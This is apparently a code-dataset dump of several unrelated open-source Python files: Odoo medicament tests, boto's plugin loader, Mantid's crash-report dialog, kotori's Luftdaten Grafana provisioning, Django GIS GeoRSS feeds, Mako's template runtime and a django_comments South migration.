self.assertFalse(test_medicament.brand_ids)
def test_compute_brand_ids_no_matches(self):
'''It should return empty recordset when there are no brand variants'''
test_medicament = self._new_medicament({'gpi': '1'})
self.assertFalse(test_medicament.brand_ids)
def test_compute_brand_ids_valid_matches(self):
'''It should return all matching medicaments, including self'''
test_medicament = self._new_medicament({'gpi': '2'})
test_medicament_2 = self._new_medicament({'gpi': '2'})
self._new_medicament({'gpi': '1'})
self.assertEqual(
test_medicament.brand_ids.ids,
[test_medicament.id, test_medicament_2.id],
)
def test_compute_generic_ids_no_gcn_id(self):
'''It should return an empty recordset for medicaments without a GCN'''
test_medicament = self._new_medicament({'gcn_id': None})
self.assertFalse(test_medicament.generic_ids)
def test_compute_generic_ids_no_matches(self):
'''It should return empty recordset if there are no generic variants'''
test_medicament = self._new_medicament({'gpi': '2'})
self.assertFalse(test_medicament.generic_ids)
def test_compute_generic_ids_valid_matches(self):
'''It should return all matching medicaments, including self'''
test_medicament = self._new_medicament({'gpi': '1'})
test_medicament_2 = self._new_medicament({'gpi': '1'})
self._new_medicament({'gpi': '2'})
self.assertEqual(
test_medicament.generic_ids.ids,
[test_medicament.id, test_medicament_2.id],
)
| agpl-3.0 | -6,770,298,627,955,971,000 | 36.185714 | 79 | 0.634268 | false |
palladius/gcloud | packages/gsutil/boto/boto/plugin.py | 111 | 2695 | # Copyright 2010 Google Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Implements plugin related api.
To define a new plugin just subclass Plugin, like this.
class AuthPlugin(Plugin):
pass
Then start creating subclasses of your new plugin.
class MyFancyAuth(AuthPlugin):
capability = ['sign', 'vmac']
The actual interface is duck typed.
"""
import glob
import imp, os.path
class Plugin(object):
"""Base class for all plugins."""
capability = []
@classmethod
def is_capable(cls, requested_capability):
"""Returns true if the requested capability is supported by this plugin
"""
for c in requested_capability:
if not c in cls.capability:
return False
return True
def get_plugin(cls, requested_capability=None):
if not requested_capability:
requested_capability = []
result = []
for handler in cls.__subclasses__():
if handler.is_capable(requested_capability):
result.append(handler)
return result
def _import_module(filename):
(path, name) = os.path.split(filename)
(name, ext) = os.path.splitext(name)
(file, filename, data) = imp.find_module(name, [path])
try:
return imp.load_module(name, file, filename, data)
finally:
if file:
file.close()
_plugin_loaded = False
def load_plugins(config):
global _plugin_loaded
if _plugin_loaded:
return
_plugin_loaded = True
if not config.has_option('Plugin', 'plugin_directory'):
return
directory = config.get('Plugin', 'plugin_directory')
for file in glob.glob(os.path.join(directory, '*.py')):
_import_module(file)
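# A minimal, illustrative sketch of the duck-typed plugin interface defined
# above; the plugin classes below are hypothetical and the helper is never
# called by the module itself.
def _example_plugin_usage():
    """Return the plugins able to 'sign', using the capability filter above."""
    class AuthPlugin(Plugin):
        pass

    class MyFancyAuth(AuthPlugin):
        capability = ['sign', 'vmac']

    # get_plugin() keeps only the subclasses whose capability list covers the
    # requested one, so this returns [MyFancyAuth].
    return get_plugin(AuthPlugin, ['sign'])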
| gpl-3.0 | -8,806,418,516,966,083,000 | 28.944444 | 79 | 0.693878 | false |
rosswhitfield/mantid | qt/python/mantidqt/dialogs/errorreports/report.py | 3 | 5965 | # Mantid Repository : https://github.com/mantidproject/mantid
#
# Copyright © 2018 ISIS Rutherford Appleton Laboratory UKRI,
# NScD Oak Ridge National Laboratory, European Spallation Source,
# Institut Laue - Langevin & CSNS, Institute of High Energy Physics, CAS
# SPDX - License - Identifier: GPL - 3.0 +
from qtpy import QtCore, QtGui, QtWidgets
from qtpy.QtCore import Signal
from qtpy.QtWidgets import QMessageBox
from mantidqt.interfacemanager import InterfaceManager
from mantidqt.utils.qt import load_ui
from .details import MoreDetailsDialog
DEFAULT_PLAIN_TEXT = (
"""Please enter any additional information about your problems. (Max 3200 characters)
For example:
Error messages on the screen
A script that causes the problem
The functions you used immediately before the problem
Thank you!""")
ErrorReportUIBase, ErrorReportUI = load_ui(__file__, 'errorreport.ui')
class CrashReportPage(ErrorReportUIBase, ErrorReportUI):
action = Signal(bool, int, str, str, str)
quit_signal = Signal()
free_text_edited = False
interface_manager = InterfaceManager()
def __init__(self, parent=None, show_continue_terminate=False):
super(self.__class__, self).__init__(parent)
self.setupUi(self)
if hasattr(self.input_free_text, 'setPlaceholderText'):
self.input_free_text.setPlaceholderText(DEFAULT_PLAIN_TEXT)
else:
# assume Qt<5
self.input_free_text.setPlainText(DEFAULT_PLAIN_TEXT)
self.input_free_text.cursorPositionChanged.connect(self.check_placeholder_text)
self.input_text = ""
if not show_continue_terminate:
self.continue_terminate_frame.hide()
self.adjustSize()
self.quit_signal.connect(QtWidgets.QApplication.instance().quit)
self.icon.setPixmap(QtGui.QPixmap(":/images/crying_mantid.png"))
self.requestTextBrowser.anchorClicked.connect(self.interface_manager.showWebPage)
self.input_name_line_edit.textChanged.connect(self.set_button_status)
self.input_email_line_edit.textChanged.connect(self.set_button_status)
self.input_free_text.textChanged.connect(self.set_button_status)
self.input_free_text.textChanged.connect(self.set_plain_text_edit_field)
self.privacy_policy_label.linkActivated.connect(self.launch_privacy_policy)
# The options on what to do after closing the window (exit/continue)
self.radioButtonContinue.setChecked(True) # Set continue to be checked by default
# These are the options along the bottom
self.fullShareButton.clicked.connect(self.fullShare)
self.nonIDShareButton.clicked.connect(self.nonIDShare)
self.noShareButton.clicked.connect(self.noShare)
self.setWindowFlags(QtCore.Qt.CustomizeWindowHint | QtCore.Qt.WindowTitleHint
| QtCore.Qt.WindowStaysOnTopHint)
self.setWindowModality(QtCore.Qt.ApplicationModal)
# Dialog window to show more details of the crash to the user.
self.details_dialog = MoreDetailsDialog(self)
def quit(self):
self.quit_signal.emit()
def fullShare(self):
self.action.emit(self.continue_working, 0, self.input_name, self.input_email,
self.input_text)
self.close()
def nonIDShare(self):
self.action.emit(self.continue_working, 1, self.input_name, self.input_email,
self.input_text)
self.close()
def noShare(self):
self.action.emit(self.continue_working, 2, self.input_name, self.input_email,
self.input_text)
self.close()
def get_simple_line_edit_field(self, expected_type, line_edit):
gui_element = getattr(self, line_edit)
value_as_string = gui_element.text()
return expected_type(value_as_string) if value_as_string else ''
def set_plain_text_edit_field(self):
self.input_text = self.get_plain_text_edit_field(text_edit="input_free_text",
expected_type=str)
def get_plain_text_edit_field(self, text_edit, expected_type):
gui_element = getattr(self, text_edit)
value_as_string = gui_element.toPlainText()
return expected_type(value_as_string) if value_as_string else ''
def check_placeholder_text(self):
if not self.free_text_edited:
self.free_text_edited = True
self.input_free_text.setPlainText("")
def launch_privacy_policy(self, link):
self.interface_manager.showWebPage(link)
def set_button_status(self):
if self.input_text == '' and not self.input_name and not self.input_email:
self.nonIDShareButton.setEnabled(True)
else:
self.nonIDShareButton.setEnabled(False)
def display_message_box(self, title, message, details):
msg = QMessageBox(self)
msg.setIcon(QMessageBox.Warning)
msg.setText(message)
msg.setWindowTitle(title)
msg.setDetailedText(details)
msg.setStandardButtons(QMessageBox.Ok)
msg.setDefaultButton(QMessageBox.Ok)
msg.setEscapeButton(QMessageBox.Ok)
msg.exec_()
def display_more_details(self, user_information_text, stacktrace_text):
self.details_dialog.set_stacktrace_text(stacktrace_text)
self.details_dialog.set_user_text(user_information_text)
self.details_dialog.show()
def set_report_callback(self, callback):
self.action.connect(callback)
@property
def input_name(self):
return self.get_simple_line_edit_field(line_edit="input_name_line_edit", expected_type=str)
@property
def input_email(self):
return self.get_simple_line_edit_field(line_edit="input_email_line_edit", expected_type=str)
@property
def continue_working(self):
return self.radioButtonContinue.isChecked()
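# A hedged usage sketch; the callback signature mirrors the `action` Signal
# declared above (continue working, share level, name, email, free text) and the
# surrounding Qt application setup is assumed to exist elsewhere.
#
#   page = CrashReportPage(show_continue_terminate=True)
#   page.set_report_callback(
#       lambda continue_working, share_level, name, email, text: None)
#   page.show()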
| gpl-3.0 | -938,921,812,033,839,000 | 37.483871 | 100 | 0.676614 | false |
zerotired/kotori | kotori/vendor/luftdaten/application.py | 2 | 4013 | # -*- coding: utf-8 -*-
# (c) 2017 Andreas Motl <[email protected]>
import json
from pkg_resources import resource_filename
from jinja2 import Template
from twisted.logger import Logger
from grafana_api_client import GrafanaPreconditionFailedError, GrafanaClientError
from kotori.daq.services.mig import MqttInfluxGrafanaService
from kotori.daq.graphing.grafana.manager import GrafanaManager
from kotori.daq.storage.influx import InfluxDBAdapter
log = Logger()
class LuftdatenGrafanaManager(GrafanaManager):
def __init__(self, *args, **kwargs):
GrafanaManager.__init__(self, *args, **kwargs)
self.tpl_dashboard_map = self.get_template('grafana-map.json')
self.tpl_dashboard_location = self.get_template('grafana-by-location.json')
def get_template(self, filename):
return Template(file(resource_filename('kotori.vendor.luftdaten', filename)).read().decode('utf-8'))
def provision(self, storage_location, message, topology):
topology = topology or {}
dashboard_name = self.strategy.topology_to_label(topology)
# The identity information of this provisioning process
signature = (storage_location.database, storage_location.measurement)
whoami = 'dashboard "{dashboard_name}" for database "{database}" and measurement "{measurement}"'.format(
dashboard_name=dashboard_name, database=storage_location.database, measurement=storage_location.measurement)
# Skip dashboard creation if it already has been created while Kotori is running
# TODO: Improve locking to prevent race conditions.
if self.keycache.exists(*signature):
log.debug('Data signature not changed, skip update of {whoami}', whoami=whoami)
return
log.info('Provisioning Grafana {whoami}', whoami=whoami)
# Create a Grafana datasource object for designated database
self.create_datasource(storage_location)
# Create appropriate Grafana dashboard
data_dashboard = {
'database': storage_location.database,
'measurement': storage_location.measurement,
'measurement_events': storage_location.measurement_events,
}
dashboard_json_map = self.tpl_dashboard_map.render(data_dashboard, title='{name} map'.format(name=dashboard_name))
dashboard_json_location = self.tpl_dashboard_location.render(data_dashboard, title='{name} by-location'.format(name=dashboard_name))
# Get or create Grafana folder for stuffing all instant dashboards into
folder = self.grafana_api.ensure_instant_folder()
folder_id = folder and folder.get('id') or None
for dashboard_json in [dashboard_json_map, dashboard_json_location]:
try:
log.info('Creating/updating dashboard "{}"'.format(dashboard_name))
response = self.grafana_api.grafana_client.dashboards.db.create(
folderId=folder_id, dashboard=json.loads(dashboard_json), overwrite=True)
log.info(u'Grafana response: {response}', response=json.dumps(response))
except GrafanaPreconditionFailedError as ex:
if 'name-exists' in ex.message or 'A dashboard with the same name already exists' in ex.message:
log.warn(ex.message)
else:
log.error('Grafana Error: {ex}', ex=ex.message)
except GrafanaClientError as ex:
log.error('Grafana Error: {ex}', ex=ex.message)
# Remember dashboard/panel creation for this kind of data inflow
self.keycache.set(storage_location.database, storage_location.measurement)
class LuftdatenMqttInfluxGrafanaService(MqttInfluxGrafanaService):
def setupService(self):
MqttInfluxGrafanaService.setupService(self)
self.settings.influxdb.use_udp = True
self.settings.influxdb.udp_port = 4445
self.influx = InfluxDBAdapter(settings = self.settings.influxdb)
| agpl-3.0 | 8,249,197,943,016,283,000 | 44.602273 | 140 | 0.688014 | false |
leopittelli/Django-on-App-Engine-Example | django/contrib/gis/feeds.py | 225 | 5932 | from __future__ import unicode_literals
from django.contrib.syndication.views import Feed as BaseFeed
from django.utils.feedgenerator import Atom1Feed, Rss201rev2Feed
class GeoFeedMixin(object):
"""
This mixin provides the necessary routines for SyndicationFeed subclasses
to produce simple GeoRSS or W3C Geo elements.
"""
def georss_coords(self, coords):
"""
In GeoRSS coordinate pairs are ordered by lat/lon and separated by
a single white space. Given a tuple of coordinates, this will return
a unicode GeoRSS representation.
"""
return ' '.join(['%f %f' % (coord[1], coord[0]) for coord in coords])
def add_georss_point(self, handler, coords, w3c_geo=False):
"""
Adds a GeoRSS point with the given coords using the given handler.
        Handles the differences between simple GeoRSS and the more popular
W3C Geo specification.
"""
if w3c_geo:
lon, lat = coords[:2]
handler.addQuickElement('geo:lat', '%f' % lat)
handler.addQuickElement('geo:lon', '%f' % lon)
else:
handler.addQuickElement('georss:point', self.georss_coords((coords,)))
def add_georss_element(self, handler, item, w3c_geo=False):
"""
This routine adds a GeoRSS XML element using the given item and handler.
"""
# Getting the Geometry object.
geom = item.get('geometry', None)
if not geom is None:
if isinstance(geom, (list, tuple)):
# Special case if a tuple/list was passed in. The tuple may be
# a point or a box
box_coords = None
if isinstance(geom[0], (list, tuple)):
# Box: ( (X0, Y0), (X1, Y1) )
if len(geom) == 2:
box_coords = geom
else:
raise ValueError('Only should be two sets of coordinates.')
else:
if len(geom) == 2:
# Point: (X, Y)
self.add_georss_point(handler, geom, w3c_geo=w3c_geo)
elif len(geom) == 4:
# Box: (X0, Y0, X1, Y1)
box_coords = (geom[:2], geom[2:])
else:
raise ValueError('Only should be 2 or 4 numeric elements.')
# If a GeoRSS box was given via tuple.
if not box_coords is None:
if w3c_geo: raise ValueError('Cannot use simple GeoRSS box in W3C Geo feeds.')
handler.addQuickElement('georss:box', self.georss_coords(box_coords))
else:
# Getting the lower-case geometry type.
gtype = str(geom.geom_type).lower()
if gtype == 'point':
self.add_georss_point(handler, geom.coords, w3c_geo=w3c_geo)
else:
if w3c_geo: raise ValueError('W3C Geo only supports Point geometries.')
# For formatting consistent w/the GeoRSS simple standard:
# http://georss.org/1.0#simple
if gtype in ('linestring', 'linearring'):
handler.addQuickElement('georss:line', self.georss_coords(geom.coords))
elif gtype in ('polygon',):
# Only support the exterior ring.
handler.addQuickElement('georss:polygon', self.georss_coords(geom[0].coords))
else:
raise ValueError('Geometry type "%s" not supported.' % geom.geom_type)
### SyndicationFeed subclasses ###
class GeoRSSFeed(Rss201rev2Feed, GeoFeedMixin):
def rss_attributes(self):
attrs = super(GeoRSSFeed, self).rss_attributes()
attrs['xmlns:georss'] = 'http://www.georss.org/georss'
return attrs
def add_item_elements(self, handler, item):
super(GeoRSSFeed, self).add_item_elements(handler, item)
self.add_georss_element(handler, item)
def add_root_elements(self, handler):
super(GeoRSSFeed, self).add_root_elements(handler)
self.add_georss_element(handler, self.feed)
class GeoAtom1Feed(Atom1Feed, GeoFeedMixin):
def root_attributes(self):
attrs = super(GeoAtom1Feed, self).root_attributes()
attrs['xmlns:georss'] = 'http://www.georss.org/georss'
return attrs
def add_item_elements(self, handler, item):
super(GeoAtom1Feed, self).add_item_elements(handler, item)
self.add_georss_element(handler, item)
def add_root_elements(self, handler):
super(GeoAtom1Feed, self).add_root_elements(handler)
self.add_georss_element(handler, self.feed)
class W3CGeoFeed(Rss201rev2Feed, GeoFeedMixin):
def rss_attributes(self):
attrs = super(W3CGeoFeed, self).rss_attributes()
attrs['xmlns:geo'] = 'http://www.w3.org/2003/01/geo/wgs84_pos#'
return attrs
def add_item_elements(self, handler, item):
super(W3CGeoFeed, self).add_item_elements(handler, item)
self.add_georss_element(handler, item, w3c_geo=True)
def add_root_elements(self, handler):
super(W3CGeoFeed, self).add_root_elements(handler)
self.add_georss_element(handler, self.feed, w3c_geo=True)
### Feed subclass ###
class Feed(BaseFeed):
"""
This is a subclass of the `Feed` from `django.contrib.syndication`.
This allows users to define a `geometry(obj)` and/or `item_geometry(item)`
methods on their own subclasses so that geo-referenced information may
placed in the feed.
"""
feed_type = GeoRSSFeed
def feed_extra_kwargs(self, obj):
return {'geometry' : self.__get_dynamic_attr('geometry', obj)}
def item_extra_kwargs(self, item):
return {'geometry' : self.__get_dynamic_attr('item_geometry', item)}
| mit | 469,958,736,604,622,460 | 42.29927 | 101 | 0.587492 | false |
jokajak/itweb | data/env/lib/python2.6/site-packages/Mako-0.3.4-py2.6.egg/mako/runtime.py | 21 | 17576 | # runtime.py
# Copyright (C) 2006, 2007, 2008, 2009, 2010 Michael Bayer [email protected]
#
# This module is part of Mako and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""provides runtime services for templates, including Context, Namespace, and various helper functions."""
from mako import exceptions, util
import __builtin__, inspect, sys
class Context(object):
"""provides runtime namespace, output buffer, and various callstacks for templates."""
def __init__(self, buffer, **data):
self._buffer_stack = [buffer]
self._orig = data # original data, minus the builtins
self._data = __builtin__.__dict__.copy() # the context data which includes builtins
self._data.update(data)
self._kwargs = data.copy()
self._with_template = None
self._outputting_as_unicode = None
self.namespaces = {}
# "capture" function which proxies to the generic "capture" function
self._data['capture'] = lambda x, *args, **kwargs: capture(self, x, *args, **kwargs)
# "caller" stack used by def calls with content
self.caller_stack = self._data['caller'] = CallerStack()
@property
def lookup(self):
return self._with_template.lookup
@property
def kwargs(self):
return self._kwargs.copy()
def push_caller(self, caller):
self.caller_stack.append(caller)
def pop_caller(self):
del self.caller_stack[-1]
def keys(self):
return self._data.keys()
def __getitem__(self, key):
return self._data[key]
def _push_writer(self):
"""push a capturing buffer onto this Context and return the new Writer function."""
buf = util.FastEncodingBuffer()
self._buffer_stack.append(buf)
return buf.write
def _pop_buffer_and_writer(self):
"""pop the most recent capturing buffer from this Context
and return the current writer after the pop.
"""
buf = self._buffer_stack.pop()
return buf, self._buffer_stack[-1].write
def _push_buffer(self):
"""push a capturing buffer onto this Context."""
self._push_writer()
def _pop_buffer(self):
"""pop the most recent capturing buffer from this Context."""
return self._buffer_stack.pop()
def get(self, key, default=None):
return self._data.get(key, default)
def write(self, string):
"""write a string to this Context's underlying output buffer."""
self._buffer_stack[-1].write(string)
def writer(self):
"""return the current writer function"""
return self._buffer_stack[-1].write
def _copy(self):
c = Context.__new__(Context)
c._buffer_stack = self._buffer_stack
c._data = self._data.copy()
c._orig = self._orig
c._kwargs = self._kwargs
c._with_template = self._with_template
c._outputting_as_unicode = self._outputting_as_unicode
c.namespaces = self.namespaces
c.caller_stack = self.caller_stack
return c
def locals_(self, d):
"""create a new Context with a copy of this Context's current state, updated with the given dictionary."""
if len(d) == 0:
return self
c = self._copy()
c._data.update(d)
return c
def _clean_inheritance_tokens(self):
"""create a new copy of this Context with tokens related to inheritance state removed."""
c = self._copy()
x = c._data
x.pop('self', None)
x.pop('parent', None)
x.pop('next', None)
return c
class CallerStack(list):
def __init__(self):
self.nextcaller = None
def __nonzero__(self):
return self._get_caller() and True or False
def _get_caller(self):
return self[-1]
def __getattr__(self, key):
return getattr(self._get_caller(), key)
def _push_frame(self):
self.append(self.nextcaller or None)
self.nextcaller = None
def _pop_frame(self):
self.nextcaller = self.pop()
class Undefined(object):
"""represents an undefined value in a template."""
def __str__(self):
raise NameError("Undefined")
def __nonzero__(self):
return False
UNDEFINED = Undefined()
class _NSAttr(object):
def __init__(self, parent):
self.__parent = parent
def __getattr__(self, key):
ns = self.__parent
while ns:
if hasattr(ns.module, key):
return getattr(ns.module, key)
else:
ns = ns.inherits
raise AttributeError(key)
class Namespace(object):
"""provides access to collections of rendering methods, which
can be local, from other templates, or from imported modules"""
def __init__(self, name, context, module=None,
template=None, templateuri=None,
callables=None, inherits=None,
populate_self=True, calling_uri=None):
self.name = name
if module is not None:
mod = __import__(module)
for token in module.split('.')[1:]:
mod = getattr(mod, token)
self._module = mod
else:
self._module = None
if templateuri is not None:
self.template = _lookup_template(context, templateuri, calling_uri)
self._templateuri = self.template.module._template_uri
else:
self.template = template
if self.template is not None:
self._templateuri = self.template.module._template_uri
self.context = context
self.inherits = inherits
if callables is not None:
self.callables = dict([(c.func_name, c) for c in callables])
else:
self.callables = None
if populate_self and self.template is not None:
(lclcallable, lclcontext) = _populate_self_namespace(context, self.template, self_ns=self)
@property
def module(self):
return self._module or self.template.module
@property
def filename(self):
if self._module:
return self._module.__file__
else:
return self.template.filename
@property
def uri(self):
return self.template.uri
@property
def attr(self):
if not hasattr(self, '_attr'):
self._attr = _NSAttr(self)
return self._attr
def get_namespace(self, uri):
"""return a namespace corresponding to the given template uri.
if a relative uri, it is adjusted to that of the template of this namespace"""
key = (self, uri)
if self.context.namespaces.has_key(key):
return self.context.namespaces[key]
else:
ns = Namespace(uri, self.context._copy(), templateuri=uri, calling_uri=self._templateuri)
self.context.namespaces[key] = ns
return ns
def get_template(self, uri):
return _lookup_template(self.context, uri, self._templateuri)
def get_cached(self, key, **kwargs):
if self.template:
if not self.template.cache_enabled:
createfunc = kwargs.get('createfunc', None)
if createfunc:
return createfunc()
else:
return None
if self.template.cache_dir:
kwargs.setdefault('data_dir', self.template.cache_dir)
if self.template.cache_type:
kwargs.setdefault('type', self.template.cache_type)
if self.template.cache_url:
kwargs.setdefault('url', self.template.cache_url)
return self.cache.get(key, **kwargs)
@property
def cache(self):
return self.template.cache
def include_file(self, uri, **kwargs):
"""include a file at the given uri"""
_include_file(self.context, uri, self._templateuri, **kwargs)
def _populate(self, d, l):
for ident in l:
if ident == '*':
for (k, v) in self._get_star():
d[k] = v
else:
d[ident] = getattr(self, ident)
def _get_star(self):
if self.callables:
for key in self.callables:
yield (key, self.callables[key])
if self.template:
def get(key):
callable_ = self.template._get_def_callable(key)
return lambda *args, **kwargs:callable_(self.context, *args, **kwargs)
for k in self.template.module._exports:
yield (k, get(k))
if self._module:
def get(key):
callable_ = getattr(self._module, key)
return lambda *args, **kwargs:callable_(self.context, *args, **kwargs)
for k in dir(self._module):
if k[0] != '_':
yield (k, get(k))
def __getattr__(self, key):
if self.callables and key in self.callables:
return self.callables[key]
if self.template and self.template.has_def(key):
callable_ = self.template._get_def_callable(key)
return lambda *args, **kwargs:callable_(self.context, *args, **kwargs)
if self._module and hasattr(self._module, key):
callable_ = getattr(self._module, key)
return lambda *args, **kwargs:callable_(self.context, *args, **kwargs)
if self.inherits is not None:
return getattr(self.inherits, key)
raise AttributeError("Namespace '%s' has no member '%s'" % (self.name, key))
def supports_caller(func):
"""apply a caller_stack compatibility decorator to a plain Python function."""
def wrap_stackframe(context, *args, **kwargs):
context.caller_stack._push_frame()
try:
return func(context, *args, **kwargs)
finally:
context.caller_stack._pop_frame()
return wrap_stackframe
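# A hedged example of the decorator above: a plain Python callable exposed to
# templates can take part in the caller stack much like a <%def> with content.
# The tag name and markup are hypothetical.
#
#   @supports_caller
#   def wrap(context):
#       context.write('<div>')
#       context['caller'].body()
#       context.write('</div>')
#       return ''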
def capture(context, callable_, *args, **kwargs):
"""execute the given template def, capturing the output into a buffer."""
if not callable(callable_):
raise exceptions.RuntimeException(
"capture() function expects a callable as "
"its argument (i.e. capture(func, *args, **kwargs))"
)
context._push_buffer()
try:
callable_(*args, **kwargs)
finally:
buf = context._pop_buffer()
return buf.getvalue()
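# Inside a template this is reached through the ``capture`` callable placed in
# the Context data above; a minimal, hypothetical use:
#
#   <%def name="mydef()">hello</%def>
#   ${capture(mydef)}   ## renders mydef and returns its output as a string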
def _decorate_toplevel(fn):
def decorate_render(render_fn):
def go(context, *args, **kw):
def y(*args, **kw):
return render_fn(context, *args, **kw)
try:
y.__name__ = render_fn.__name__[7:]
except TypeError:
# < Python 2.4
pass
return fn(y)(context, *args, **kw)
return go
return decorate_render
def _decorate_inline(context, fn):
def decorate_render(render_fn):
dec = fn(render_fn)
def go(*args, **kw):
return dec(context, *args, **kw)
return go
return decorate_render
def _include_file(context, uri, calling_uri, **kwargs):
"""locate the template from the given uri and include it in the current output."""
template = _lookup_template(context, uri, calling_uri)
(callable_, ctx) = _populate_self_namespace(context._clean_inheritance_tokens(), template)
callable_(ctx, **_kwargs_for_include(callable_, context._orig, **kwargs))
def _inherit_from(context, uri, calling_uri):
"""called by the _inherit method in template modules to set up the inheritance chain at the start
of a template's execution."""
if uri is None:
return None
template = _lookup_template(context, uri, calling_uri)
self_ns = context['self']
ih = self_ns
while ih.inherits is not None:
ih = ih.inherits
lclcontext = context.locals_({'next':ih})
ih.inherits = Namespace("self:%s" % template.uri, lclcontext, template = template, populate_self=False)
context._data['parent'] = lclcontext._data['local'] = ih.inherits
callable_ = getattr(template.module, '_mako_inherit', None)
if callable_ is not None:
ret = callable_(template, lclcontext)
if ret:
return ret
gen_ns = getattr(template.module, '_mako_generate_namespaces', None)
if gen_ns is not None:
gen_ns(context)
return (template.callable_, lclcontext)
def _lookup_template(context, uri, relativeto):
lookup = context._with_template.lookup
if lookup is None:
raise exceptions.TemplateLookupException("Template '%s' has no TemplateLookup associated" % context._with_template.uri)
uri = lookup.adjust_uri(uri, relativeto)
try:
return lookup.get_template(uri)
except exceptions.TopLevelLookupException, e:
raise exceptions.TemplateLookupException(str(e))
def _populate_self_namespace(context, template, self_ns=None):
if self_ns is None:
self_ns = Namespace('self:%s' % template.uri, context, template=template, populate_self=False)
context._data['self'] = context._data['local'] = self_ns
if hasattr(template.module, '_mako_inherit'):
ret = template.module._mako_inherit(template, context)
if ret:
return ret
return (template.callable_, context)
def _render(template, callable_, args, data, as_unicode=False):
"""create a Context and return the string output of the given template and template callable."""
if as_unicode:
buf = util.FastEncodingBuffer(unicode=True)
elif template.output_encoding:
buf = util.FastEncodingBuffer(
unicode=as_unicode,
encoding=template.output_encoding,
errors=template.encoding_errors)
else:
buf = util.StringIO()
context = Context(buf, **data)
context._outputting_as_unicode = as_unicode
context._with_template = template
_render_context(template, callable_, context, *args, **_kwargs_for_callable(callable_, data))
return context._pop_buffer().getvalue()
def _kwargs_for_callable(callable_, data):
argspec = inspect.getargspec(callable_)
# for normal pages, **pageargs is usually present
if argspec[2]:
return data
# for rendering defs from the top level, figure out the args
namedargs = argspec[0] + [v for v in argspec[1:3] if v is not None]
kwargs = {}
for arg in namedargs:
if arg != 'context' and arg in data and arg not in kwargs:
kwargs[arg] = data[arg]
return kwargs
def _kwargs_for_include(callable_, data, **kwargs):
argspec = inspect.getargspec(callable_)
namedargs = argspec[0] + [v for v in argspec[1:3] if v is not None]
for arg in namedargs:
if arg != 'context' and arg in data and arg not in kwargs:
kwargs[arg] = data[arg]
return kwargs
def _render_context(tmpl, callable_, context, *args, **kwargs):
import mako.template as template
# create polymorphic 'self' namespace for this template with possibly updated context
if not isinstance(tmpl, template.DefTemplate):
# if main render method, call from the base of the inheritance stack
(inherit, lclcontext) = _populate_self_namespace(context, tmpl)
_exec_template(inherit, lclcontext, args=args, kwargs=kwargs)
else:
# otherwise, call the actual rendering method specified
(inherit, lclcontext) = _populate_self_namespace(context, tmpl.parent)
_exec_template(callable_, context, args=args, kwargs=kwargs)
def _exec_template(callable_, context, args=None, kwargs=None):
"""execute a rendering callable given the callable, a Context, and optional explicit arguments
the contextual Template will be located if it exists, and the error handling options specified
on that Template will be interpreted here.
"""
template = context._with_template
if template is not None and (template.format_exceptions or template.error_handler):
error = None
try:
callable_(context, *args, **kwargs)
except Exception, e:
_render_error(template, context, e)
except:
e = sys.exc_info()[0]
_render_error(template, context, e)
else:
callable_(context, *args, **kwargs)
def _render_error(template, context, error):
if template.error_handler:
result = template.error_handler(context, error)
if not result:
raise error
else:
error_template = exceptions.html_error_template()
if context._outputting_as_unicode:
context._buffer_stack[:] = [util.FastEncodingBuffer(unicode=True)]
else:
context._buffer_stack[:] = [util.FastEncodingBuffer(
error_template.output_encoding,
error_template.encoding_errors)]
context._with_template = error_template
error_template.render_context(context, error=error)
| gpl-3.0 | -927,779,595,786,785,900 | 36.002105 | 127 | 0.587676 | false |
LagunaJS/Midori | django_comments/south_migrations/0001_initial.py | 11 | 7979 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from django.contrib.auth import get_user_model
User = get_user_model()
user_orm_label = '%s.%s' % (User._meta.app_label, User._meta.object_name)
user_model_label = '%s.%s' % (User._meta.app_label, User._meta.module_name)
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Comment'
db.create_table('django_comments', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(related_name='content_type_set_for_comment', to=orm['contenttypes.ContentType'])),
('object_pk', self.gf('django.db.models.fields.TextField')()),
('site', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='comment_comments', null=True, to=orm[user_orm_label])),
('user_name', self.gf('django.db.models.fields.CharField')(max_length=50, blank=True)),
('user_email', self.gf('django.db.models.fields.EmailField')(max_length=75, blank=True)),
('user_url', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
('comment', self.gf('django.db.models.fields.TextField')(max_length=3000)),
('submit_date', self.gf('django.db.models.fields.DateTimeField')(default=None)),
('ip_address', self.gf('django.db.models.fields.GenericIPAddressField')(max_length=39, null=True, blank=True)),
('is_public', self.gf('django.db.models.fields.BooleanField')(default=True)),
('is_removed', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'django_comments', ['Comment'])
# Adding model 'CommentFlag'
db.create_table('django_comment_flags', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(related_name='comment_flags', to=orm[user_orm_label])),
('comment', self.gf('django.db.models.fields.related.ForeignKey')(related_name='flags', to=orm['django_comments.Comment'])),
('flag', self.gf('django.db.models.fields.CharField')(max_length=30, db_index=True)),
('flag_date', self.gf('django.db.models.fields.DateTimeField')(default=None)),
))
db.send_create_signal(u'django_comments', ['CommentFlag'])
